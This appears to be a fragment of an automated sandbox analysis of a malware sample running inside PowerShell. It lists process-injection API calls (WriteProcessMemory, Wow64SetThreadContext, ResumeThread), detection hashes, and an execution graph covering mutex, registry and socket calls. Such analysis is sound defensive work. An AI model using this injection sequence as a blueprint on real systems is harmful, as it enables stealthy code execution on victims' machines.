                                                                                              • Instruction Fuzzy Hash: 664197B5D10258DFCF10CFA9D984AEEFBF1BB09310F24902AE818B7210D375AA55CB64

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 309 225f91-225fff 310 226001-226013 309->310 311 226016-226076 WriteProcessMemory 309->311 310->311 312 226078-22607e 311->312 313 22607f-2260bd 311->313 312->313
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00226066
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 05ef92d0b1c9f8f3b8452d8fa7a03f1d9e2977920c0fa361d4bf7ab2cec18b2a
                                                                                              • Instruction ID: e77cb4b214401ede589df1f3edb38f534022ec63df859181999f5d7e8a2ce314
                                                                                              • Opcode Fuzzy Hash: 05ef92d0b1c9f8f3b8452d8fa7a03f1d9e2977920c0fa361d4bf7ab2cec18b2a
                                                                                              • Instruction Fuzzy Hash: 09419AB5D002589FCF01CFA9D984ADEFBF1BB4A310F24902AE818B7210D375AA45CF64

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 332 225c61-225cc4 333 225cc6-225cd8 332->333 334 225cdb-225d22 Wow64SetThreadContext 332->334 333->334 335 225d24-225d2a 334->335 336 225d2b-225d63 334->336 335->336
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 00225D12
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: eb57dd686f1304c8df243946f1f79f68ced75d424b446697b8767967869b8ce6
                                                                                              • Instruction ID: d96b4f17df7352c740dc651c2cded409f6d7845e28b1ad8612d25c2e9f6dc28b
                                                                                              • Opcode Fuzzy Hash: eb57dd686f1304c8df243946f1f79f68ced75d424b446697b8767967869b8ce6
                                                                                              • Instruction Fuzzy Hash: B931A9B5D012689FCB10CFA9E884ADEFBF1AB49314F24802AE419B7250D378A945CF64

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 316 221738-225cc4 318 225cc6-225cd8 316->318 319 225cdb-225d22 Wow64SetThreadContext 316->319 318->319 320 225d24-225d2a 319->320 321 225d2b-225d63 319->321 320->321
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 00225D12
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: 91c25d917a41a705cedbcd4c3a98e3510f15e28aefd1aff5107ea263247d140b
                                                                                              • Instruction ID: b98a33e1fb1bd554bea5d5cdf7146db4ad7217ca37288392eeec03d7b375ad04
                                                                                              • Opcode Fuzzy Hash: 91c25d917a41a705cedbcd4c3a98e3510f15e28aefd1aff5107ea263247d140b
                                                                                              • Instruction Fuzzy Hash: A1319BB5D112689FCB14CFA9E584ADEFBF1EB49314F24802AE415B7310D374A945CF64

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 324 221780-225cc4 326 225cc6-225cd8 324->326 327 225cdb-225d22 Wow64SetThreadContext 324->327 326->327 328 225d24-225d2a 327->328 329 225d2b-225d63 327->329 328->329
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 00225D12
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: c11fb490c454ea1a0f451a32765782f9845f7dc02ebd8ab9fba11a1fd700a9ca
                                                                                              • Instruction ID: a214ee9c8bbf09f231b150b9915d783e6907d6a3d4073b5834a7277e673d9e6d
                                                                                              • Opcode Fuzzy Hash: c11fb490c454ea1a0f451a32765782f9845f7dc02ebd8ab9fba11a1fd700a9ca
                                                                                              • Instruction Fuzzy Hash: 90319BB5D112689FCB14CFA9D584ADEFBF1EB49314F24802AE419B7310D374A945CF64

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 339 2260d0-22615e ResumeThread 340 226160-226166 339->340 341 226167-226195 339->341 340->341
                                                                                              APIs
                                                                                              • ResumeThread.KERNELBASE(?), ref: 0022614E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: e00972115977a9c609eabc1ef647de1f94cc926e7caf96a76da8364aedc1af43
                                                                                              • Instruction ID: 772d2204a316a77103795c81b230375721ee03b1bd111e3d503d0273f46f6a72
                                                                                              • Opcode Fuzzy Hash: e00972115977a9c609eabc1ef647de1f94cc926e7caf96a76da8364aedc1af43
                                                                                              • Instruction Fuzzy Hash: 69219BB9D042189FDB11CFA9D584ADEFBF0AB4A314F24905AE819B7310C374A945CF65

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 344 221798-22615e ResumeThread 346 226160-226166 344->346 347 226167-226195 344->347 346->347
                                                                                              APIs
                                                                                              • ResumeThread.KERNELBASE(?), ref: 0022614E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: 32cc7d3ebf89e89e18b807a575fcaa2fe7016aefb91057828c5ad868e8ba1a85
                                                                                              • Instruction ID: 003f66aa28b668a603d2344f6dccc495bba40db72fd9c1d428b8dc233bb738b2
                                                                                              • Opcode Fuzzy Hash: 32cc7d3ebf89e89e18b807a575fcaa2fe7016aefb91057828c5ad868e8ba1a85
                                                                                              • Instruction Fuzzy Hash: D621ACB9D102189FCB10CFA9D484ADEFBF4EB09314F20901AE818B7310D374A955CFA5

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 350 2261b0-2261c1 352 2261c3-2261e1 350->352 353 226149-22615e ResumeThread 350->353 354 226160-226166 353->354 355 226167-226195 353->355 354->355
                                                                                              APIs
                                                                                              • ResumeThread.KERNELBASE(?), ref: 0022614E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: de2b90d4f2d1e8376e7a71c73b80be6103348a86fc84c424cb8d97b69faa9cb8
                                                                                              • Instruction ID: 682ca81d1524f2aaa9c7ba110183a0c9d9f47bd879090b7e31c0faa2e63ff70b
                                                                                              • Opcode Fuzzy Hash: de2b90d4f2d1e8376e7a71c73b80be6103348a86fc84c424cb8d97b69faa9cb8
                                                                                              • Instruction Fuzzy Hash: 43117C36D053459FCB02CFA8D4982DDBBF0AF4A320F154097C444E7212D6792C5ACB20

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373823920.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7f0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: d=&
                                                                                              • API String ID: 0-142243757
                                                                                              • Opcode ID: bdfce051077339690103387c92e11f623c9f207d17f1d366ab5ab47c198c36b1
                                                                                              • Instruction ID: 7945f6246fa6aef40fe1e124a7fd0d82766c0a5db3997a28c1ae9180dd18db6f
                                                                                              • Opcode Fuzzy Hash: bdfce051077339690103387c92e11f623c9f207d17f1d366ab5ab47c198c36b1
                                                                                              • Instruction Fuzzy Hash: 40219F3170424DDBDB298F28C854BBA7B62AB45311F2484A5E7414B3D3DB78D892CB56
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373823920.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7f0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bf8257947c0a3eca1cf494a104061a231b52ad60ce9c1d518c72b83d6bc555a7
                                                                                              • Instruction ID: 29142095bf5d307b9b5393ec397dfa8fbc0f70b3c29c4ef61018493bd39e84ac
                                                                                              • Opcode Fuzzy Hash: bf8257947c0a3eca1cf494a104061a231b52ad60ce9c1d518c72b83d6bc555a7
                                                                                              • Instruction Fuzzy Hash: C2416835704208DBCB295E29C5106BAB7E6AF91371FA884BBDA598B341DB7CCC41C761
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373593318.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_19d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e0976a01c9d42be819b5261bd8a5a6bc92e0473809b069275f34da0bdf22d81b
                                                                                              • Instruction ID: 0c082b2c945fd335733d1d58268c85a60e7294852b7935252afa4a06a8b70c7f
                                                                                              • Opcode Fuzzy Hash: e0976a01c9d42be819b5261bd8a5a6bc92e0473809b069275f34da0bdf22d81b
                                                                                              • Instruction Fuzzy Hash: 1B01A771504340DBEB108E25DCC4767BF98DF51764F2CC515FC490B186C3799845CAB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373593318.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_19d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c1fa5d2c3433583275416dc4de56176a25e7a03bf6168e65d9eca78c84233148
                                                                                              • Instruction ID: 0f452136a00bd43231c078ce0af81f9b2458d2b4f4ecddf81feaf1d8db7d170c
                                                                                              • Opcode Fuzzy Hash: c1fa5d2c3433583275416dc4de56176a25e7a03bf6168e65d9eca78c84233148
                                                                                              • Instruction Fuzzy Hash: B3F06271504344AFEB108E16DCC4B62FF98EB91764F18C55AED885A286C3799C44CAB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373823920.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7f0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2abc3c08fee1cb1dd47e5e049f8da03c305a6f74d4ed957c620548434eff47d0
                                                                                              • Instruction ID: dedc91ffdfebc768869b4a401c01f51afc9bc97de1f017bb6bc83d19a3f21fa3
                                                                                              • Opcode Fuzzy Hash: 2abc3c08fee1cb1dd47e5e049f8da03c305a6f74d4ed957c620548434eff47d0
                                                                                              • Instruction Fuzzy Hash: CDE0D871B04348CBDF59A66590213BD7B616FA2251F9081E6C95097346DA388805C362
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d606f7ae3540133074522bab2029bab79378c4838f18ef0a056344208d81f7f0
                                                                                              • Instruction ID: 225a799c4e51ab96712335f5bd3a011f777835df7ccf7a6cb12152c8a29dc227
                                                                                              • Opcode Fuzzy Hash: d606f7ae3540133074522bab2029bab79378c4838f18ef0a056344208d81f7f0
                                                                                              • Instruction Fuzzy Hash: F5314BA291D3D11FE7079A6998A93823F70EB37291F5B08FBC581CB0D3E51D851B9352
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373823920.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7f0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (:&$(:&$(:&$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:&$L:&$L:&
                                                                                              • API String ID: 0-3774716360
                                                                                              • Opcode ID: 040577ea8104ce34d9fb55fa25935299a03ef3fb112d011bdf6647c748909486
                                                                                              • Instruction ID: 077a4c45e02b3803bfff7ac97d76ad9cca141d2fccb70f227d89100fae2c714a
                                                                                              • Opcode Fuzzy Hash: 040577ea8104ce34d9fb55fa25935299a03ef3fb112d011bdf6647c748909486
                                                                                              • Instruction Fuzzy Hash: ECD10831704258EFDB259B68C81477E7BA2AF81310F14847AEA059B393DB78DD45CBE1

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.7%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:4.4%
                                                                                              Total number of Nodes:1320
                                                                                              Total number of Limit Nodes:46
47939->48389 47943 41bf69 47940->47943 47945 401fd8 11 API calls 47943->47945 47944 41bf3d 47946 401fe2 28 API calls 47944->47946 47948 40ea5f 47945->47948 47949 41bf46 47946->47949 47947 401fe2 28 API calls 47955 41bebf 47947->47955 47956 40fb52 47948->47956 47950 401fd8 11 API calls 47949->47950 47952 41bf4e 47950->47952 47951 401fd8 11 API calls 47951->47955 47953 41cec5 28 API calls 47952->47953 47953->47936 47955->47936 47955->47939 47955->47947 47955->47951 48377 4041a2 28 API calls 47955->48377 48378 41cec5 47955->48378 47957 40fb5e 47956->47957 47959 40fb65 47956->47959 48415 402163 11 API calls 47957->48415 47959->47399 47961 402163 47960->47961 47965 40219f 47961->47965 48416 402730 11 API calls 47961->48416 47963 402184 48417 402712 11 API calls std::_Deallocate 47963->48417 47965->47401 47967 401e6d 47966->47967 47970 401e75 47967->47970 48418 402158 22 API calls 47967->48418 47970->47406 47972 4020df 11 API calls 47971->47972 47973 40532a 47972->47973 48419 4032a0 47973->48419 47975 405346 47975->47414 48424 4051ef 47976->48424 47978 406391 48428 402055 47978->48428 47981 401fe2 47982 401ff1 47981->47982 47989 402039 47981->47989 47983 4023ce 11 API calls 47982->47983 47984 401ffa 47983->47984 47985 40203c 47984->47985 47987 402015 47984->47987 47986 40267a 11 API calls 47985->47986 47986->47989 48462 403098 28 API calls 47987->48462 47990 401fd8 47989->47990 47991 4023ce 11 API calls 47990->47991 47992 401fe1 47991->47992 47992->47427 47994 401fd2 47993->47994 47995 401fc9 47993->47995 47994->47432 48463 4025e0 28 API calls 47995->48463 48464 401fab 47997->48464 47999 40d0ae CreateMutexA GetLastError 47999->47448 48465 41c048 48000->48465 48005 401fe2 28 API calls 48006 41b390 48005->48006 48007 401fd8 11 API calls 48006->48007 48008 41b398 48007->48008 48009 4135e1 31 API calls 48008->48009 48011 41b3ee 48008->48011 48010 41b3c1 48009->48010 48012 41b3cc StrToIntA 48010->48012 48011->47454 48013 41b3e3 48012->48013 48014 41b3da 48012->48014 48015 
401fd8 11 API calls 48013->48015 48473 41cffa 22 API calls 48014->48473 48015->48011 48018 407765 48017->48018 48019 413584 3 API calls 48018->48019 48020 40776c 48019->48020 48020->47465 48020->47466 48022 41bd03 48021->48022 48474 40b93f 48022->48474 48024 41bd0b 48024->47482 48026 401f22 48025->48026 48027 401f6a 48025->48027 48028 402252 11 API calls 48026->48028 48034 401f09 48027->48034 48029 401f2b 48028->48029 48030 401f6d 48029->48030 48032 401f46 48029->48032 48507 402336 48030->48507 48506 40305c 28 API calls 48032->48506 48035 402252 11 API calls 48034->48035 48036 401f12 48035->48036 48036->47494 48038 4139a0 48037->48038 48039 406e13 28 API calls 48038->48039 48040 4139b5 48039->48040 48041 4020f6 28 API calls 48040->48041 48042 4139c5 48041->48042 48043 4137aa 14 API calls 48042->48043 48044 4139cf 48043->48044 48045 401fd8 11 API calls 48044->48045 48046 4139dc 48045->48046 48046->47544 48048 40209b 48047->48048 48049 4023ce 11 API calls 48048->48049 48050 4020a6 48049->48050 48511 4024ed 48050->48511 48054 4137fa 48053->48054 48056 4137c3 48053->48056 48055 401fd8 11 API calls 48054->48055 48057 40efd9 48055->48057 48058 4137d5 RegSetValueExA RegCloseKey 48056->48058 48057->47545 48058->48054 48060 43bb45 _strftime 48059->48060 48515 43ae83 48060->48515 48062 40eff2 48062->47551 48062->47553 48064 41b631 48063->48064 48065 41b596 GetLocalTime 48063->48065 48066 401fd8 11 API calls 48064->48066 48067 40531e 28 API calls 48065->48067 48068 41b639 48066->48068 48069 41b5d8 48067->48069 48070 401fd8 11 API calls 48068->48070 48071 406383 28 API calls 48069->48071 48072 40f048 48070->48072 48073 41b5e4 48071->48073 48072->47569 48542 402f10 48073->48542 48076 406383 28 API calls 48077 41b5fc 48076->48077 48547 40723b 77 API calls 48077->48547 48079 41b60a 48080 401fd8 11 API calls 48079->48080 48081 41b616 48080->48081 48082 401fd8 11 API calls 48081->48082 48083 41b61f 48082->48083 48084 401fd8 11 API calls 48083->48084 48085 41b628 48084->48085 48086 
401fd8 11 API calls 48085->48086 48086->48064 48088 409e3d _wcslen 48087->48088 48089 409e48 48088->48089 48090 409e5f 48088->48090 48092 40da6f 31 API calls 48089->48092 48091 40da6f 31 API calls 48090->48091 48093 409e67 48091->48093 48094 409e50 48092->48094 48095 401f13 28 API calls 48093->48095 48096 401f13 28 API calls 48094->48096 48097 409e75 48095->48097 48111 409e5a 48096->48111 48098 401f09 11 API calls 48097->48098 48100 409e7d 48098->48100 48099 401f09 11 API calls 48101 409eb4 48099->48101 48566 409196 28 API calls 48100->48566 48551 40a144 48101->48551 48104 409e8f 48567 403014 48104->48567 48108 401f13 28 API calls 48109 409ea4 48108->48109 48110 401f09 11 API calls 48109->48110 48110->48111 48111->48099 48113 41b6c1 GetUserNameW 48112->48113 48603 40417e 48113->48603 48118 403014 28 API calls 48119 41b703 48118->48119 48120 401f09 11 API calls 48119->48120 48121 41b70c 48120->48121 48122 401f09 11 API calls 48121->48122 48123 40f25e 48122->48123 48123->47622 48125 41355b RegQueryValueExA RegCloseKey 48124->48125 48126 40f31f 48124->48126 48125->48126 48126->47495 48126->47651 48128 413a7a RegDeleteValueW 48127->48128 48129 40f3cd 48127->48129 48128->48129 48129->47489 48131 40dd96 48130->48131 48132 41353a 3 API calls 48131->48132 48133 40dd9d 48132->48133 48134 40ddbc 48133->48134 48698 401707 48133->48698 48138 414f65 48134->48138 48136 40ddaa 48701 4138b2 RegCreateKeyA 48136->48701 48139 4020df 11 API calls 48138->48139 48140 414f79 48139->48140 48721 41b944 48140->48721 48143 4020df 11 API calls 48144 414f8f 48143->48144 48145 401e65 22 API calls 48144->48145 48146 414f9d 48145->48146 48147 43bb2c _strftime 40 API calls 48146->48147 48148 414faa 48147->48148 48149 414fbc 48148->48149 48150 414faf Sleep 48148->48150 48151 402093 28 API calls 48149->48151 48150->48149 48152 414fcb 48151->48152 48153 401e65 22 API calls 48152->48153 48154 414fd4 48153->48154 48155 4020f6 28 API calls 48154->48155 48156 414fdf 48155->48156 48157 41beac 28 API calls 
48156->48157 48158 414fe7 48157->48158 48725 40489e WSAStartup 48158->48725 48160 414ff1 48161 401e65 22 API calls 48160->48161 48162 414ffa 48161->48162 48163 401e65 22 API calls 48162->48163 48189 415079 48162->48189 48164 415013 48163->48164 48165 401e65 22 API calls 48164->48165 48166 415024 48165->48166 48169 401e65 22 API calls 48166->48169 48167 41beac 28 API calls 48167->48189 48168 401e65 22 API calls 48168->48189 48170 415035 48169->48170 48171 401e65 22 API calls 48170->48171 48173 415046 48171->48173 48172 406c59 28 API calls 48172->48189 48175 401e65 22 API calls 48173->48175 48174 401fe2 28 API calls 48174->48189 48176 415057 48175->48176 48177 401e65 22 API calls 48176->48177 48178 415069 48177->48178 48838 40473d 89 API calls 48178->48838 48180 402093 28 API calls 48180->48189 48181 41b580 80 API calls 48181->48189 48183 4151c7 WSAGetLastError 48731 41cb72 48183->48731 48189->48167 48189->48168 48189->48172 48189->48174 48189->48180 48189->48181 48189->48183 48191 40531e 28 API calls 48189->48191 48192 401e8d 11 API calls 48189->48192 48193 402f10 28 API calls 48189->48193 48194 43bb2c _strftime 40 API calls 48189->48194 48196 406383 28 API calls 48189->48196 48197 401fd8 11 API calls 48189->48197 48201 4020f6 28 API calls 48189->48201 48203 4135e1 31 API calls 48189->48203 48207 4153f6 48189->48207 48726 414f24 48189->48726 48742 40482d 48189->48742 48749 404f51 48189->48749 48764 4048c8 connect 48189->48764 48824 404e26 WaitForSingleObject 48189->48824 48839 4052fd 28 API calls 48189->48839 48840 4145f8 51 API calls 48189->48840 48841 409097 28 API calls 48189->48841 48842 441ed1 20 API calls 48189->48842 48843 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 48189->48843 48191->48189 48192->48189 48193->48189 48195 415b0a Sleep 48194->48195 48195->48189 48196->48189 48197->48189 48201->48189 48203->48189 48204 40417e 28 API calls 48204->48207 48207->48189 48207->48204 48208 401e65 22 API calls 48207->48208 48212 41bc1f 28 API calls 48207->48212 
48214 41bdaf 28 API calls 48207->48214 48217 406383 28 API calls 48207->48217 48218 402ea1 28 API calls 48207->48218 48219 402f10 28 API calls 48207->48219 48221 401fd8 11 API calls 48207->48221 48222 401f09 11 API calls 48207->48222 48225 402093 28 API calls 48207->48225 48226 41b580 80 API calls 48207->48226 48227 415aac CreateThread 48207->48227 48844 40ddc4 6 API calls 48207->48844 48845 41bcd3 28 API calls 48207->48845 48847 41bb77 GetTickCount 48207->48847 48848 41bb27 30 API calls ___scrt_fastfail 48207->48848 48849 40f90c 29 API calls 48207->48849 48850 402f31 28 API calls 48207->48850 48851 404aa1 61 API calls _Yarn 48207->48851 48852 404c10 113 API calls ___std_exception_copy 48207->48852 48853 40b08c 85 API calls 48207->48853 48209 415474 GetTickCount 48208->48209 48846 41bc1f 28 API calls 48209->48846 48212->48207 48214->48207 48217->48207 48218->48207 48219->48207 48221->48207 48222->48207 48225->48207 48226->48207 48227->48207 48915 41ada8 105 API calls 48227->48915 48228->47407 48229->47415 48230->47419 48233 4020df 11 API calls 48232->48233 48234 406c65 48233->48234 48235 4032a0 28 API calls 48234->48235 48236 406c82 48235->48236 48236->47440 48238 40ebdf 48237->48238 48239 4135ae RegQueryValueExA RegCloseKey 48237->48239 48238->47437 48238->47455 48239->48238 48240->47445 48241->47474 48242->47465 48243->47457 48244->47473 48916 401f86 48245->48916 48248 40dae0 48250 41c048 GetCurrentProcess 48248->48250 48249 40daab 48920 41b645 29 API calls 48249->48920 48254 40dae5 48250->48254 48251 40daa1 48253 40dbd4 GetLongPathNameW 48251->48253 48256 40417e 28 API calls 48253->48256 48257 40dae9 48254->48257 48258 40db3b 48254->48258 48255 40dab4 48259 401f13 28 API calls 48255->48259 48260 40dbe9 48256->48260 48263 40417e 28 API calls 48257->48263 48262 40417e 28 API calls 48258->48262 48264 40dabe 48259->48264 48261 40417e 28 API calls 48260->48261 48265 40dbf8 48261->48265 48266 40db49 48262->48266 48267 40daf7 48263->48267 48269 401f09 11 API calls 
48264->48269 48923 40de0c 28 API calls 48265->48923 48272 40417e 28 API calls 48266->48272 48273 40417e 28 API calls 48267->48273 48269->48251 48270 40dc0b 48924 402fa5 28 API calls 48270->48924 48275 40db5f 48272->48275 48276 40db0d 48273->48276 48274 40dc16 48925 402fa5 28 API calls 48274->48925 48922 402fa5 28 API calls 48275->48922 48921 402fa5 28 API calls 48276->48921 48280 40dc20 48283 401f09 11 API calls 48280->48283 48281 40db6a 48284 401f13 28 API calls 48281->48284 48282 40db18 48285 401f13 28 API calls 48282->48285 48286 40dc2a 48283->48286 48287 40db75 48284->48287 48288 40db23 48285->48288 48289 401f09 11 API calls 48286->48289 48290 401f09 11 API calls 48287->48290 48291 401f09 11 API calls 48288->48291 48292 40dc33 48289->48292 48293 40db7e 48290->48293 48294 40db2c 48291->48294 48295 401f09 11 API calls 48292->48295 48296 401f09 11 API calls 48293->48296 48297 401f09 11 API calls 48294->48297 48298 40dc3c 48295->48298 48296->48264 48297->48264 48299 401f09 11 API calls 48298->48299 48300 40dc45 48299->48300 48301 401f09 11 API calls 48300->48301 48302 40dc4e 48301->48302 48302->47531 48303->47542 48304->47565 48305->47524 48306->47557 48309 434563 48307->48309 48308 43bda0 ___std_exception_copy 21 API calls 48308->48309 48309->48308 48310 40f10c 48309->48310 48926 443001 7 API calls 2 library calls 48309->48926 48927 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48309->48927 48928 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48309->48928 48310->47595 48314->47627 48315->47615 48317->47659 48318->47464 48321 41b556 LoadResource LockResource SizeofResource 48320->48321 48322 40f419 48320->48322 48321->48322 48323 43bda0 48322->48323 48328 4461b8 ___crtLCMapStringA 48323->48328 48324 4461f6 48340 44062d 20 API calls _free 48324->48340 48326 4461e1 RtlAllocateHeap 48327 4461f4 48326->48327 48326->48328 48327->47917 48328->48324 48328->48326 48339 443001 7 API calls 2 library calls 
48328->48339 48331 4020bf 48330->48331 48341 4023ce 48331->48341 48333 4020ca 48345 40250a 48333->48345 48335 4020d9 48335->47920 48337 4020b7 28 API calls 48336->48337 48338 406e27 48337->48338 48338->47927 48339->48328 48340->48327 48342 402428 48341->48342 48343 4023d8 48341->48343 48342->48333 48343->48342 48352 4027a7 11 API calls std::_Deallocate 48343->48352 48346 40251a 48345->48346 48347 402520 48346->48347 48348 402535 48346->48348 48353 402569 48347->48353 48363 4028e8 28 API calls 48348->48363 48351 402533 48351->48335 48352->48342 48364 402888 48353->48364 48355 40257d 48356 402592 48355->48356 48357 4025a7 48355->48357 48369 402a34 22 API calls 48356->48369 48371 4028e8 28 API calls 48357->48371 48360 40259b 48370 4029da 22 API calls 48360->48370 48362 4025a5 48362->48351 48363->48351 48365 402890 48364->48365 48366 402898 48365->48366 48372 402ca3 22 API calls 48365->48372 48366->48355 48369->48360 48370->48362 48371->48362 48374 4020e7 48373->48374 48375 4023ce 11 API calls 48374->48375 48376 4020f2 48375->48376 48376->47955 48377->47955 48379 41ced2 48378->48379 48380 41cf31 48379->48380 48385 41cee2 48379->48385 48381 41cf4b 48380->48381 48382 41d071 28 API calls 48380->48382 48399 41d1d7 28 API calls 48381->48399 48382->48381 48384 41cf2d 48384->47955 48386 41cf1a 48385->48386 48390 41d071 48385->48390 48398 41d1d7 28 API calls 48386->48398 48389->47944 48392 41d079 48390->48392 48391 41d0ab 48391->48386 48392->48391 48393 41d0af 48392->48393 48396 41d093 48392->48396 48410 402725 22 API calls 48393->48410 48400 41d0e2 48396->48400 48398->48384 48399->48384 48401 41d0ec __EH_prolog 48400->48401 48411 402717 22 API calls 48401->48411 48403 41d0ff 48412 41d1ee 11 API calls 48403->48412 48405 41d125 48406 41d15d 48405->48406 48413 402730 11 API calls 48405->48413 48406->48391 48408 41d144 48414 402712 11 API calls std::_Deallocate 48408->48414 48411->48403 48412->48405 48413->48408 48414->48406 48415->47959 48416->47963 48417->47965 48421 4032aa 
